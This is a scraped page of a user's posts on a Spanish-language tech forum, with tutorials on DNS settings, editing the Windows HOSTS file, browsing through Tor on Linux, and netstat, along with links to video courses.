Julio 27, 2011, 04:14:32 PMDNS son las siglas de Domain Name System o Sistema de Nombres de Dominio. Los servidores DNS se encargan de traducir los nombres de dominio, como por ejemplo No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, en su dirección IP, que es el número que identifica al servidor al que se manda la petición. Dicho de forma sencilla, el DNS sería un listín telefónico en el que buscando el apellido de una persona (bandaancha.eu) obtenemos su número de teléfono (89.248.106.100).
¿Cómo afectan las DNS a la velocidad de mi conexión?
Las DNS únicamente intervienen en el momento en el que se establece la conexión entre dos ordenadores (Ej.: al entrar en una web). Cuando el navegador tarda mucho tiempo en encontrar una web (en IE pone "Buscando sitio: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta" en la barra de estado) suele ser, bien porque nuestro DNS primario está caído o por alguna otra razón (saturación de usuarios, etc.) tiene un tiempo de respuesta muy alto. Los DNS no influyen mientras se está transmitiendo la información, como cuando se descarga un archivo de una web. Por lo tanto, poner unos buenos DNS mejorará la velocidad de navegación, pero no la de transferencia.
¿Debo cambiar las DNS que me da mi operadora?
En la configuración del TCP/IP se pueden especificar en una lista, que DNS queremos utilizar. Para resolver un nombre de dominio, nuestro sistema envía la consulta al primer DNS que aparece en la lista. En el caso de que no esté operativo, va descendiendo y realizando consultas al resto de DNS según el orden en el que aparecen, hasta que encuentra uno que responda.
Suele ocurrir muchas veces que la conexión ADSL esta operativa y sin embargo si intentamos acceder a una URL correcta nos pone "No se pudo encontrar el servidor o error DNS". Esto es debido a que en ese momento todos los DNS que aparecen en la lista están caídos. Para solucionar esto solo hay que cambiar los DNS por otros que funcionen.
En principio es recomendable utilizar los DNS de nuestra operadora, ya que las consultas tendrán que pasar por menos nodos y suelen dar un mejor tiempo de respuesta. Solo en el caso de que los de nuestra operadora estén muy ocupados es conveniente utilizar otros externos. Otra solución consiste en utilizar DNS no públicos. Muchas veces las operadoras disponen de más DNS aparte de los que dan a sus usuarios y que suelen estar menos saturados.

Windows 7 y/o Windows Vista

- 1.Panel de control > Ver el estado y las tareas de red
- 2.En la parte izquierda, Cambiar configuración del adaptador
- 3.Seleccionamos la tarjeta de red que queramos cambiar. Si usamos Wi-Fi, será una conexión de red inalámbrica, si no, una conexión de área local. Con el botón derecho del ratón, Propiedades.
- 4.En Protocolo de internet versión 4, Propiedades.
- 5.Elegimos Usar las siguientes direcciones de servidor DNS e introducimos las que queramos.
- 6.Aceptamos y cerramos.

Windows XP

- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta a Panel de control > Conexiones de red
- 2.Abra la conexión de red que quiera modificar
- 3.Pulse el Botón Propiedades
- 4.Haga Doble clic sobre Internet Protocol (TCP/IP)
- 5.Seleccione 'Usar las siguientes DNS' e introduzca primero la de su ordenador.
- 6.Pulse Aceptar

Linux
1. Edita el archivo /etc/resolv.conf
[/list]
nano /etc/resolv.conf
2. Tendrá un contenido similar al siguiente
nameserver 80.58.61.250
nameserver 80.58.61.254
3. Modifica las IP's que aparecen, o añade otras nuevas
4. Para que dichas IP's sigan vigentes tras reiniciar el sistema, edita el fichero /etc/dhcp3/dhclient.conf, y añade al final la siguiente línea:
supersede domain-name-servers XX.XX.XX.XX, YY.YY.YY.YY;
donde XX.XX.XX.XX e YY.YY.YY.YY son, respectivamente, las IP's de las DNS primaria y secundaria deseadas.
5. Guarda el nuevo contenido de ambos ficheros.
6. Y por último, para que los cambios surtan efecto inmediatamente ejecutar en un terminal (con privilegios de superusuario):
/etc/init.d/networking restart

Mac OS X Leopard
- 1.Acceder al icono Apple (esquina superior izquierda)
- 2.Seleccionar Preferencias del sistema...
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta en el icono Red
- No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta en el botón Avanzado...
- 5.Acceder a la pestaña DNS
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#194
Windows / [Tutorial] Todo sobre el archivo HOSTS
Julio 27, 2011, 03:52:05 PMSeguramente muchos de vosotros ya lo conocéis, yo tengo que reconocer que no sabía de la existencia del archivo HOSTS (Sin extensión) hasta el otro día, cuando un amigo del Chat de IV hizo la siguiente consulta: "cómo podría bloquear el acceso a ciertas páginas web, sin usar ningún software".
En ese mismo momento no supe contestarle y tampoco los amigos que se encontraban en la sala; la preguntita se me quedó dando vueltas en la cabeza y empecé a indagar sobre el asunto, como siempre con la ayuda de SanGoogle al poco descubrí que con él archivo HOSTS (Sin extensión), podíamos hacer exactamente lo que pedía el amigo y algunas cosas más que posteriormente fui descubriendo y que paso a comentarles.
El archivo HOSTS (Sin extensión).
A qué viene tanto con lo de "archivo HOSTS (Sin extensión) ": Debo decir que lo que voy a redactar a continuación es fruto del estudio y recopilación de algunos artículos que se encuentran por la web incluida Microsoft, casi todos los autores insisten en recalcarlo ya que es un archivo que no tiene una extensión como todos los demás (.doc, .bat, .txt, etc...) "de ahí lo raro", simplemente se llama HOSTS, a partir de ahora así le nombraré pero era necesario aclararlo.
Qué es el archivo HOSTS...?
Cuando escribimos una dirección web ó nombre de dominio en el navegador, por ejemplo: "www.google.es", éste nombre tiene que traducirse a una Dirección IP=209.85.229.99 para que el sistema lo entienda y poder localizar el servidor solicitado. Este proceso de traducción se conoce como Resolución de Nombres

El archivo HOSTS es un archivo utilizado por Windows a modo de "agenda" ó "libreta de direcciones" para asociar Nombres de Dominio con Direcciones IP.
Cuando escribimos la Dirección Web en el navegador, el sistema examina primero el archivo HOSTS para ver si este contiene la Direccion IP de ese sitio, de no tenerla consultará al Servidor DNS del operador que nos dé servicio de internet ó al que nosotros hayamos configurado.
Si la Dirección IP está en el listado del archivo HOSTS, el sitio será cargado y abierto en nuestro navegador, de esta manera tardará menos la apertura de la página.

Si por el contrario no la tiene, entonces lanzará la pregunta al Servidor DNS, este traducirá el Nombre de Dominio a Dirección IP y se producirá la carga y apertura de la página, lógicamente tardará más tiempo y si el Servidor DNS tiene algún fallo en ese momento la página puede que no nos cargue.


Donde está y cómo se edita el archivo HOSTS...?
A estas alturas algunos ya os estaréis preguntando cómo encontrar el dichoso archivo y sobre todo como podemos editarlo para que sirva a nuestros propósitos.
El archivo HOSTS dependiendo de la versión de Windows lo podemos encontrar en:
Con el botón derecho del ratón pinchamos en una zona libre del escritorio y nos vamos a Nuevo\Acceso directo


Cuando se abra la ventana ingresamos la dirección que corresponda a nuestra versión de Windows y pinchamos en siguiente, en la nueva ventana ponemos un nombre al archivo y pinchamos en finalizar.


En el escritorio se nos habrá creado un archivo similar a este, para abrirlo pinchamos sobre él de nuevo con el botón derecho del ratón y elegimos abrir.


En la nueva ventana pinchamos en Notepad (Bloc de Notas) ó el que usemos y pinchamos en Aceptar.


A partir de aquí ya podemos empezar a editar el archivo HOSTS como si se tratara de un archivo de texto.
Si hay más datos, tales como mas direcciones y nombres de dominio, y pensamos agregar más direcciones, es recomendable hacer una copia de seguridad de este archivo, para ello lo guardamos en la misma carpeta con extensión .TXT por ejemplo, así tendríamos dos archivos, uno HOSTS y otro HOSTS.txt.

¿Cuál es el contenido mínimo y máximo que debe tener el archivo HOSTS...?
En principio, el mínimo tiene que ser este:
Código:
Código: text
Nuestro ordenador tiene una dirección predeterminada para su propio uso, esta es conocida como la dirección "localhost", y su Dirección IP es 127.0.0.1 la cual se usa para referenciarse así mismo. Si asociamos otros nombres de dominio con nuestra Direccion IP local, habremos bloqueado ese dominio debido a que todos los intentos por cargar ese dominio se irán a la direccion 127.0.0.1, pero eso lo veremos más adelante.
En cuanto al máximo no parece que haya un límite conocido aunque debe haberlo, he podido leer de algunos autores que aseguran tener más de 10.000 líneas en sus archivos HOSTS.

Algunas cosas a saber sobre el archivo HOSTS antes de ponernos a editarlo:

Y por Fin, para qué sirve y que podemos hacer con el archivo HOSTS...?
Hasta ahora ya hemos visto cómo funciona, donde encontrarlo y cómo editar el archivo HOSTS. A continuación veremos algunas cosas que podemos hacer y cómo hacerlas.
Acelerar la descarga de las páginas más visitadas:
Bloquear la navegación a un dominio determinado.
Utilizar abreviaturas para nombres de servidores
Bloquear la navegación por todos los dominios menos en uno:
Restaurar el archivo Hosts a su estado original

En ese mismo momento no supe contestarle y tampoco los amigos que se encontraban en la sala; la preguntita se me quedó dando vueltas en la cabeza y empecé a indagar sobre el asunto, como siempre con la ayuda de SanGoogle al poco descubrí que con él archivo HOSTS (Sin extensión), podíamos hacer exactamente lo que pedía el amigo y algunas cosas más que posteriormente fui descubriendo y que paso a comentarles.

A qué viene tanto con lo de "archivo HOSTS (Sin extensión) ": Debo decir que lo que voy a redactar a continuación es fruto del estudio y recopilación de algunos artículos que se encuentran por la web incluida Microsoft, casi todos los autores insisten en recalcarlo ya que es un archivo que no tiene una extensión como todos los demás (.doc, .bat, .txt, etc...) "de ahí lo raro", simplemente se llama HOSTS, a partir de ahora así le nombraré pero era necesario aclararlo.


Cuando escribimos una dirección web ó nombre de dominio en el navegador, por ejemplo: "www.google.es", éste nombre tiene que traducirse a una Dirección IP=209.85.229.99 para que el sistema lo entienda y poder localizar el servidor solicitado. Este proceso de traducción se conoce como Resolución de Nombres

El archivo HOSTS es un archivo utilizado por Windows a modo de "agenda" ó "libreta de direcciones" para asociar Nombres de Dominio con Direcciones IP.
Cuando escribimos la Dirección Web en el navegador, el sistema examina primero el archivo HOSTS para ver si este contiene la Direccion IP de ese sitio, de no tenerla consultará al Servidor DNS del operador que nos dé servicio de internet ó al que nosotros hayamos configurado.
Si la Dirección IP está en el listado del archivo HOSTS, el sitio será cargado y abierto en nuestro navegador, de esta manera tardará menos la apertura de la página.

Si por el contrario no la tiene, entonces lanzará la pregunta al Servidor DNS, este traducirá el Nombre de Dominio a Dirección IP y se producirá la carga y apertura de la página, lógicamente tardará más tiempo y si el Servidor DNS tiene algún fallo en ese momento la página puede que no nos cargue.

CitarNOTA: El archivo HOSTS no es un archivo absolutamente necesario para el Sistema, por lo que podemos tenerlo ó no, de existir hara su función, si no existiera directamente el sistema hará la llamada al servidor DNS, también lo podemos crear nosotros de la siguiente forma:
Abrimos un archivo nuevo con el Bloc de notas, lo editamos y guardamos con el nombre HOSTS sin darle ninguna extensión en las direcciones que a continuación detallo...


A estas alturas algunos ya os estaréis preguntando cómo encontrar el dichoso archivo y sobre todo como podemos editarlo para que sirva a nuestros propósitos.
El archivo HOSTS dependiendo de la versión de Windows lo podemos encontrar en:
Citar• Windows 95/98/Me: C:\Windows\ hostsPara que nos sea más sencillo encontrarlo podemos crear un acceso directo al archivo por ejemplo en el escritorio.
• Windows NT/2000: C:\WINNT\System32\drivers\etc\hosts
• Windows XP: C:\WINDOWS\system32\drivers\etc\hosts
• Windows XP 64: C:\WINDOWS\system32\drivers\etc\hosts ó C:\WINDOWS\SysWOW64\Drivers\etc\hosts
• Windows 2003: C:\WINDOWS\system32\drivers\etc\hosts
• Windows Vista: C:\WINDOWS\system32\drivers\etc\hosts
• Windows 7: C:\Windows\System32\drivers\etc
Con el botón derecho del ratón pinchamos en una zona libre del escritorio y nos vamos a Nuevo\Acceso directo


Cuando se abra la ventana ingresamos la dirección que corresponda a nuestra versión de Windows y pinchamos en siguiente, en la nueva ventana ponemos un nombre al archivo y pinchamos en finalizar.


En el escritorio se nos habrá creado un archivo similar a este, para abrirlo pinchamos sobre él de nuevo con el botón derecho del ratón y elegimos abrir.


En la nueva ventana pinchamos en Notepad (Bloc de Notas) ó el que usemos y pinchamos en Aceptar.

CitarUna vez abierto nos encontraremos con algo parecido a esto, seguramente con algunas líneas de direcciones más.NOTA IMPORTANTE: Siempre abriremos este archivo de esta manera exactamente, NO repito NO lo podemos predeterminar para que abra siempre con el bloc de notas.

A partir de aquí ya podemos empezar a editar el archivo HOSTS como si se tratara de un archivo de texto.
Si hay más datos, tales como mas direcciones y nombres de dominio, y pensamos agregar más direcciones, es recomendable hacer una copia de seguridad de este archivo, para ello lo guardamos en la misma carpeta con extensión .TXT por ejemplo, así tendríamos dos archivos, uno HOSTS y otro HOSTS.txt.


En principio, el mínimo tiene que ser este:
Código:
127.0.0.1 localhost
Nuestro ordenador tiene una dirección predeterminada para su propio uso, esta es conocida como la dirección "localhost", y su Dirección IP es 127.0.0.1 la cual se usa para referenciarse así mismo. Si asociamos otros nombres de dominio con nuestra Direccion IP local, habremos bloqueado ese dominio debido a que todos los intentos por cargar ese dominio se irán a la direccion 127.0.0.1, pero eso lo veremos más adelante.
En cuanto al máximo no parece que haya un límite conocido aunque debe haberlo, he podido leer de algunos autores que aseguran tener más de 10.000 líneas en sus archivos HOSTS.


Citar• Se pueden asignar varios nombres de dominio a una misma dirección IP.
• El archivo se lee de arriba a abajo por lo que se deben colocar al comienzo los nombres utilizados más a menudo.
• Un nombre de dominio puede tener hasta 255 caracteres. En sistemas Windows no se distingue entre mayúsculas y minúsculas.
• Las líneas que comienzan con el signo # solo sirven para información nuestra, no tienen ningún efecto en el sistema.


Hasta ahora ya hemos visto cómo funciona, donde encontrarlo y cómo editar el archivo HOSTS. A continuación veremos algunas cosas que podemos hacer y cómo hacerlas.
Citar• Acelerar la descarga de las páginas más visitadasEmpecemos:
• Bloquear la navegación a un dominio determinado
• Utilizar abreviaturas para nombres de servidores
• Bloquear la navegación por todos los dominios menos en uno
• Restaurar el archivo HOSTS a su estado original

CitarPara ello añadimos al archivo HOSTS las direcciones IP de las 5 o 10 páginas que visitamos más frecuentemente, especialmente la IP de la página de inicio del navegador.
Podemos editar nuestro archivo HOSTS de la siguiente manera:
Código:
Código: text # Ejemplo de archivo HOSTS
127.0.0.1 localhost
209.85.229.99 www.google.es
174.136.1.0 www.intercambiosvirtuales.org
Ni que decir tiene que si alguna página de las que tengamos configuradas no nos abre en algún momento deberemos revisar la IP de nuevo y comprobar que no haya cambiado, de haberlo hecho deberemos actualizarla en el archivo HOSTS.
Para conocer la IP asociada a un Nombre de Dominio podemos hacerlo con el comando PING.
De esta forma: Pinchamos en Inicio> Ejecutar, escribimos: cmd y pinchamos Aceptar ó pulsamos Enter
Nos abrirá la ventana de Símbolo de sistema donde escribimos: "ping No tienes permitido ver enlaces. Registrate o Entra a tu cuenta" y pulsamos enter, inmediatamente nos saldrá en la siguiente línea el siguiente resultado:
Haciendo ping a intercambiosvirtuales.org [174.136.1.0] con 32 bytes de datos:
Donde: 174.136.1.0 será la Dirección IP de No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

CitarSi asignamos la IP local 127.0.0.1 a un nombre de dominio en el archivo HOSTS, no se podrá navegar por las páginas web de ese dominio.
Lo haremos de la siguiente manera:
Código:
Código: text # Ejemplo de archivo HOSTS
127.0.0.1 localhost
127.0.0.1 www.ejemplopornográfica.net

CitarPodemos asignar abreviaturas o nombres distintos a servidores web. Estos servidores tienen que ser dedicados (o sea, responder a una IP) y no virtuales (varios servidores responden a la misma IP).
El siguiente archivo HOSTS provoca que al escribir "buceo", "www.sebutesa.com" o "www.buceoenlinea.com" se abra siempre la página de "www.sebutesa.com".
Código:
Código: text # Ejemplo de archivo HOSTS
127.0.0.1 localhost
66.113.214.119 buceo
66.113.214.119 www.sebutesa.com
66.113.214.119 www.buceoenlinea.com

CitarEn el área empresarial nos puede interesar que los empleados únicamente puedan navegar por el sitio web corporativo. Una forma muy sencilla de conseguirlo es eliminar el servidor DNS de la configuración TCP/IP, restringir el acceso al icono Red del Panel de control y crear un archivo HOSTS que únicamente contenga una entrada: la del web corporativo.
Sólo los expertos en TCP/IP advertirán que pueden navegar por otras páginas escribiendo la dirección IP (en el caso de servidores dedicados) o modificando el archivo HOSTS (tanto en servidores virtuales como en dedicados). Estas IPs tienen que haber sido conseguidas de algún PC que tenga el servicio DNS disponible, por lo que incluso a los expertos en TCP/IP les resultará tan incómoda esta tarea que desistirán en su intento.

CitarComo ya hemos visto una configuración incorrecta en este archivo puede impedir la navegación por ciertas páginas o llevar a dominios que no le corresponden.
Algunos malwares modifican el archivo HOSTS para redirigir hacia otros servidores (generalmente para impedir la actualización de antivirus u otro software de seguridad), también pueden bloquear el acceso a páginas Web de utilidad, como los antivirus en línea para dificultar el proceso de desinfección del PC.
Si fuera nuestro caso podemos devolver el archivo HOSTS a su estado original borrando todo y anotando la línea que antes dijimos sería la única necesaria - 127.0.0.1 localhost - a continuación pondríamos los ajustes cómo lo tuviéramos configurado anteriormente.
Si el archivo HOSTS no es el culpable, probablemente sea nuestro servidor DNS el que esté proporcionando una información incorrecta: en este caso podemos escribir la IP correspondiente en el archivo HOSTS después de haberla obtenido de otro equipo que no presente el error.NOTA: Una forma de proteger el archivo HOSTS en cierta medida, es marcando la casilla de: Solo Lectura en propiedades de archivo.
Algunas utilidades "Spybot Search and Destroy por ejemplo", agregan al archivo HOSTS direcciones de conocidos sitios que descargan adwares ó spywares (comúnmente denominados parásitos ó bichos), para que estos nunca sean accedidos. Un ejemplo:
Código:
Código: text 127.0.0.1 c3.xxxcounter.com
127.0.0.1 califia.imaginemedia.com
127.0.0.1 cds.mediaplex.com
127.0.0.1 click.avenuea.com
127.0.0.1 click.go2net.com
127.0.0.1 click.linksynergy.com
127.0.0.1 cookies.cmpnet.com
127.0.0.1 cornflakes.pathfinder.com
127.0.0.1 counter.hitbox.com
Otros cómo "ZoneAlarm" agregan una protección contra la modificación no autorizada del archivo HOSTS.

Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#195
Python / Videotutoriales programación en Python 3 [Español]
Julio 25, 2011, 04:28:07 PM
1. Introducción
2. Hola mundo
3. Tipos de datos básicos
4. Referencia de objeto (Variables)
5. Colección de tipos de datos
6. Operaciones lógicas
7. Operador de pertenencia (in)
8. Uso de if, elif, else, and, or
9. Estructura de control while
10. Estructura de control for
11. Introducción a excepciones
12. Excepciones continue break input
13. Funciones
14. Operadores aritméticos
Como verán Python es un lenguage muy fácil de aprender
2. Hola mundo
3. Tipos de datos básicos
4. Referencia de objeto (Variables)
5. Colección de tipos de datos
6. Operaciones lógicas
7. Operador de pertenencia (in)
8. Uso de if, elif, else, and, or
9. Estructura de control while
10. Estructura de control for
11. Introducción a excepciones
12. Excepciones continue break input
13. Funciones
14. Operadores aritméticos
Como verán Python es un lenguage muy fácil de aprender

#196
Cursos, manuales y libros / Java Script basico [Video-Tutorial]
Julio 18, 2011, 03:56:57 PMVideo-Tutorial: Java Script Basico

Los creditos doy al canal de PMVT tutoriales por ofrecerme la posibilidad de compartir el video curso de JAVA SCRIPT. se supone que es un curso basico pero ya hay que tener conocimiento de muchas cosas como porejemplo, conceptos basicos de java, para que se usa, que es, quien lo usa y como se hace.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#197
GNU/Linux / Navegar con Proxy "Tor" en GNU/Linux
Julio 14, 2011, 01:25:20 PM
Bueno este post fue ideado para todos aquellos que usamos alguna distribución de Linux, ya sea debían y sus derivados, todo empezó cuando utilice una conexión con módem usb de tigo, y casi siempre que iba a descargar me decia que ya estaba descargando algun fichero o simplemente que ya habia llegado a mi limite e descargas y buscando en la red encontre una solucion, con la cual podemos cambiar nuestra ip, ahhh y otra es que en windows se escucha de muchos programas para ocultar nuestra ip, y en este post les demostrare que tambien se puede en Linux sin ningun tipo de licencia, empecemos
Los programas que ocultan tu ip para winbugs hace lo siguiente: No oculta tu ip, me refiero a que sigues teniendo una, lo que hace es conectarte a un proxy de forma que a vista del exterior tienes otra ip, siendo aun asi facil de identificar.
Tor hace lo siguiente: Tor para GNU/Linux a de realizar lo mismo, o quizás lo hace mejor. Tor no te conecta a un sólo proxy, si no que a cientos de ellos de forma que intentar averiguar tu IP, desde fuera, es muy dificil o casi imposible.

INSTALACION Y CONFIGURACION
Primero un poco de lo que vamos a usar:
* Tor (The onion router) es un proyecto de software libre y una red abierta que nos ayuda a defendernos contra cualquier tipo de análisis de tráfico permitiéndonos navegar de libremente y de forma anónima.
* Polipo: proxy HTTP de caché, que maneja SOCKS4a, lo que evita que Firefox envíe las solicitudes de DNS por fuera de la red Tor, poniendo en peligro el anonimato. También acelera la navegación usando la red Tor.
* Vidalia: interfaz gráfica para configurar Tor. Muy útil y fácil de manejar.
* Torbutton: extensión de Firefox que nos permite habilitar/deshabilitar la navegación usando Tor.
AHORA SI ENTREMOSLE A LA INSTALACION:
1. Vamos a agregar tor a los repositorios, y para eso copiamos y pegamos el siguiente comando en una terminal:
REPOSITORIO TOR:
echo deb No tienes permitido ver enlaces. Registrate o Entra a tu cuenta $(lsb_release -cs) main | sudo tee /etc/apt/sources.list.d/torproject.list
2. Ahora agregamos la clave del repositorio que acabamos de agregar:
3. Actualizamos los repositorios:
4. Instalamos el tor con el siguiente comando (tambien instala polipo):
5. Ahora instalamos Vidalia con el siguiente comando:
Durante la instalación de Vidalia nos va a preguntar si queremos que sea Vidalia quien se encargue del arranque de Tor. Lo mejor es contestar Yes (and disable it for every boot) si queremos controlar con Vidalia el uso de Tor. De esta forma Tor se iniciará sólo cuando ejecutemos Vidalia. De forma que si no pensamos usar Tor cada vez que nos conectemos a Internet, es una muy buena opción. Pero cada uno que seleccione lo que se adapte a sus condiciones o circunstancias.

6. Descargamos el archivo de configuracion de polipo para usar con tor, con este comando:
ARCHIVO CONFIGURACION POLIPO:
wget No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
7. Vamos a hacer una copia de seguridad de la configuracion original de polipo con este comando:
8. Vamos a reemplazar el archivo original por el descargado con este comando:
La configuracion que estamos reemplazando se hace porque esta ya esta modificada con todos los cambios recientes para que no de problema en ubuntu 10.04.
9. Reiniciamos el polipo con este comando:
10. Ejecutamos Vidalia para iniciar Tor y comprobar que todo se ha instalado correctamente. Para esto hacemos clic en el menú Aplicaciones > Internet > Vidalia.
11. Vidalia intentará iniciar Tor automáticamente y si todo ha ido bien veremos la siguiente ventana:

12. Ahora la instalacion de TorButton: Vamos a ir a la siguiente página: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta .

13. En la parte superior veremos un mensaje de Firefox en el que se nos indica que ha evitado que se instale el Torbutton, pero como nosotros queremos instalarlo tenemos que pulsar el botón Permitir (en otros navegadores todavia no lo he probado, se los dejo como tarea.
14. Le damos instalar ahora:

15. Reiniciamos firefox:

17. Ahora ya esta todo instalado y para probarlo vamos a la siguiente pagina: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

18. Como tenemos Tor desactivado, la página nos lo mostrará directamente. Para activarlo hacemos clic en el botón que hay en la parte inferior derecha con el nombre Tor desactivado. 19. Ahora que ya esta habilitado, recargamos la página o volvemos a acceder a la web No tienes permitido ver enlaces. Registrate o Entra a tu cuenta para comprobar que estamos usando Tor.

20. Ya con eso esta todo listo y estaremos navegando ANONIMAMENTE y protegiendo nuestra pc en tiempo real contra ataques virtuales o incluso para saltarnos algunas prohibiciones de algunas paginas, quiero añadir que este tutorial por así decirlo, es una colaboración de otras personas, de mi parte solo esta la intención de incrementar los conocimientos de los compañeros que usan GNU/Linux y tienen este tipo de problemas, encontrándoles una solución, para que no abandonen este distribución que tiene mucho que dar y además no tengan nada que envidiar a winbugs.
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Los programas que ocultan tu ip para winbugs hace lo siguiente: No oculta tu ip, me refiero a que sigues teniendo una, lo que hace es conectarte a un proxy de forma que a vista del exterior tienes otra ip, siendo aun asi facil de identificar.
Tor hace lo siguiente: Tor para GNU/Linux a de realizar lo mismo, o quizás lo hace mejor. Tor no te conecta a un sólo proxy, si no que a cientos de ellos de forma que intentar averiguar tu IP, desde fuera, es muy dificil o casi imposible.

INSTALACION Y CONFIGURACION
Primero un poco de lo que vamos a usar:
* Tor (The onion router) es un proyecto de software libre y una red abierta que nos ayuda a defendernos contra cualquier tipo de análisis de tráfico permitiéndonos navegar de libremente y de forma anónima.
* Polipo: proxy HTTP de caché, que maneja SOCKS4a, lo que evita que Firefox envíe las solicitudes de DNS por fuera de la red Tor, poniendo en peligro el anonimato. También acelera la navegación usando la red Tor.
* Vidalia: interfaz gráfica para configurar Tor. Muy útil y fácil de manejar.
* Torbutton: extensión de Firefox que nos permite habilitar/deshabilitar la navegación usando Tor.
AHORA SI ENTREMOSLE A LA INSTALACION:
1. Vamos a agregar tor a los repositorios, y para eso copiamos y pegamos el siguiente comando en una terminal:
REPOSITORIO TOR:
echo deb No tienes permitido ver enlaces. Registrate o Entra a tu cuenta $(lsb_release -cs) main | sudo tee /etc/apt/sources.list.d/torproject.list
2. Ahora agregamos la clave del repositorio que acabamos de agregar:
Citar
CLAVE DE REPOS dijo:
gpg –keyserver No tienes permitido ver enlaces. Registrate o Entra a tu cuenta –recv 886DDD89 && gpg –export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
3. Actualizamos los repositorios:
Citar
ACTUALIZAR REPOS:
sudo aptitude update
4. Instalamos el tor con el siguiente comando (tambien instala polipo):
Citar
INSTALAR TOR Y POLIPO:
sudo aptitude install tor tor-geoipdb
5. Ahora instalamos Vidalia con el siguiente comando:
Citar
INSTALACION DE VIDALIA:
sudo aptitude install vidalia
Durante la instalación de Vidalia nos va a preguntar si queremos que sea Vidalia quien se encargue del arranque de Tor. Lo mejor es contestar Yes (and disable it for every boot) si queremos controlar con Vidalia el uso de Tor. De esta forma Tor se iniciará sólo cuando ejecutemos Vidalia. De forma que si no pensamos usar Tor cada vez que nos conectemos a Internet, es una muy buena opción. Pero cada uno que seleccione lo que se adapte a sus condiciones o circunstancias.

6. Descargamos el archivo de configuracion de polipo para usar con tor, con este comando:
ARCHIVO CONFIGURACION POLIPO:
wget No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
7. Vamos a hacer una copia de seguridad de la configuracion original de polipo con este comando:
Citar
COPIA DE SEGURIDAD POLIPO:
sudo cp /etc/polipo/config{,.original}
8. Vamos a reemplazar el archivo original por el descargado con este comando:
Citar
REEMPLAZO ARCHIVO ORIGINAL :
sudo mv polipo.conf /etc/polipo/config
La configuracion que estamos reemplazando se hace porque esta ya esta modificada con todos los cambios recientes para que no de problema en ubuntu 10.04.
9. Reiniciamos el polipo con este comando:
Citar
REINICIAR POLIPO:
sudo service polipo restart
10. Ejecutamos Vidalia para iniciar Tor y comprobar que todo se ha instalado correctamente. Para esto hacemos clic en el menú Aplicaciones > Internet > Vidalia.
11. Vidalia intentará iniciar Tor automáticamente y si todo ha ido bien veremos la siguiente ventana:

12. Ahora la instalacion de TorButton: Vamos a ir a la siguiente página: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta .

13. En la parte superior veremos un mensaje de Firefox en el que se nos indica que ha evitado que se instale el Torbutton, pero como nosotros queremos instalarlo tenemos que pulsar el botón Permitir (en otros navegadores todavia no lo he probado, se los dejo como tarea.

14. Le damos instalar ahora:

15. Reiniciamos firefox:

17. Ahora ya esta todo instalado y para probarlo vamos a la siguiente pagina: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

18. Como tenemos Tor desactivado, la página nos lo mostrará directamente. Para activarlo hacemos clic en el botón que hay en la parte inferior derecha con el nombre Tor desactivado. 19. Ahora que ya esta habilitado, recargamos la página o volvemos a acceder a la web No tienes permitido ver enlaces. Registrate o Entra a tu cuenta para comprobar que estamos usando Tor.

20. Ya con eso esta todo listo y estaremos navegando ANONIMAMENTE y protegiendo nuestra pc en tiempo real contra ataques virtuales o incluso para saltarnos algunas prohibiciones de algunas paginas, quiero añadir que este tutorial por así decirlo, es una colaboración de otras personas, de mi parte solo esta la intención de incrementar los conocimientos de los compañeros que usan GNU/Linux y tienen este tipo de problemas, encontrándoles una solución, para que no abandonen este distribución que tiene mucho que dar y además no tengan nada que envidiar a winbugs.
Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#198
Tutoriales / Adobe After Effects CS5 Profesional 1-2-3 Español [Videotutorial - Video2Brain]
Julio 03, 2011, 04:51:08 PM

After Effects es la aplicación de Adobe destinada a la postproducción y Motion graphics, perfectamente integrada en la Creative Suite 5, y comunicándose perfectamente con Adobe Premiere, Adobe Encore, Photoshop, Illustrator, etc. After Effects es el programa con más trayectoria en el entorno PC y Mac, lo que le ha permitido crecer y evolucionar desde principios de los años 90. Tras estos cursos podrás enfrentarte a muchos proyectos de postproducción y Motion Graphics avanzados que antes te habrían resultado inalcanzables.

Pass: elkape (tipear el password, no copiarlo y pegarlo)

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#199
Windows / 10 Ejemplos Utiles del Comando netstat
Julio 03, 2011, 03:13:39 PM
El comando netstat muestra varias informaciones relacionadas a la red, tales como conexiones de red, tablas de ruteo, estadísticas, conexiones enmascaradas, miembros multicast, etc.
En este articulo se revisara 10 ejemplos practicos sobre el uso del comando netstat.
1) Listar todos los puertos (Abiertos y No abiertos)
Listar todos los puertos usando netstat -a
# netstat -a | more
Listar todos los puertos TCP usando netstat -at
# netstat -at
Listar todos los puertos UDP usando netstat -au
# netstat -au
2) Listar todos los sockets que esten estado Listening
Listar solo los puertos en Listening usando netstat -l
# netstat -l
Listar solo los puertos TCP que esten en Listening usando netstat -lt
# netstat -lt
Listar solo los puertos UDP que esten en Listening usando netstat -lu
# netstat -lu
Listar solo los puertos UNIX que esten en Listening usando netstat -lx
# netstat -lx
3) Mostrar las estadisticas de cada protocolo
Mostrar las estadísticas de cada puerto usando netstat -s
# netstat -s
Mostrar estadísticas para puertos TCP o UP usando netstat -st o netstat -su
# netstat -st
# netstat -su
4) Mostrar PID y nombre de programa en la salida de netstat usando netstat -p
La opción netstat -p puede ser combinada con cualquier otra opción. Esto agregara el "PID/Nombre Programa" a la salida del netstat. Esto es muy útil cuando se esta depurando para identificar que programa esta ejecutándose en un puerto en particular.
# netstat -pt
